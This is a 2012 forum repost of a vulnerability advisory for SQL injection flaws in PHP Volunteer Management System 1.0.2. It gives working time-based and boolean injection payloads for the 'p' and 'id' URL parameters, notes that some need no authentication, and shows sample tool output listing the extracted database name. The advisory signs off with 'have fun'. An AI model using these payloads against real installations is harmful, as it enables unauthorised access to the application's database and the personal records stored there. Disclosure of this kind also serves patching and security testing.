The_Arhitect Posted May 29, 2012 Report Posted May 29, 2012 PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln.# Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities# Version: 1.0.2# Author/Found by: loneferret# Software Site: https://sourceforge.net/projects/phpvolunteer/# Other vulnerabilities: http://www.exploit-db.com/exploits/18941/# Date found: May 28th 2012# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23# Vulnerability:# Due to improper sanitation, many of the parameters are injectable,# some need to be authenticated, others not.# As always have fun...PoC:Page: index.phpParameter: ?p=Method: GETPayload: /?p=dashboard' and sleep(5) and '1'='1Payload: /?p=login' and sleep(5) and '1'='1Other affected parameters can be found in the message section ofthe application when reading or deleting a message.Parameter: id=Url: /?p=read_message&id=2Payload: /?p=read_message&id=-1' or '1'='1Possible output:[10:00:02] [INFO] searching database 'bf102'[10:00:02] [INFO] the SQL query used returns 1 entries[10:00:02] [INFO] resumed: "bf102"found databases [1]: [*] bf102Sursa: PHP Volunteer Management System v 1.0.2 multiple SQLi Vuln. Quote